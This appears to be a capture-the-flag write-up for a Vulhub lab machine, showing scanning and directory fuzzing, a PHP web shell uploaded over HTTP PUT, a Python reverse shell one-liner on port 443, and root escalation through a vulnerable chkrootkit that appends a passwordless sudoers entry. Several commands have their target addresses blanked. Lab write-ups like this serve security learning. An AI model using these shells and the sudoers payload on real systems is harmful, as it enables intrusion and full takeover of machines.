From Vulhub


  • netdiscover
  • Nmap
  • Nikto
  • Wfuzz
  • Curl

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Looks like port 22 and port 80 are openning.

Check the

Not excited.

use Nikto:

Still nothing cool

try wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

find a test dir:

next exam the HTTP options:

curl -v -X OPTIONS

looks like it supports PUT.

Now upload php reverse shell (I tried different ports, looks like only 443 port works):

nmap -p80 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'

now the shell is uploaded:

get the reverse shell:

A better php shell:

<?php system($_GET["exec"]); ?>

Upload this shell, and in brower:

1 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

get the shell.

During enumeration step, I follow g0tmi1k

ls -l /etc/cron.daily

After enumeration, find the system has chkrootkit:

dpkg -l | grep chkrootkit

chkrootkit verions is 0.49 and it is vulnerable.

searchsploit chkrootkit

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

also need to change the privilages on the update file with chmod 777 and wait:

ls -al /etc/sudoers


sudo su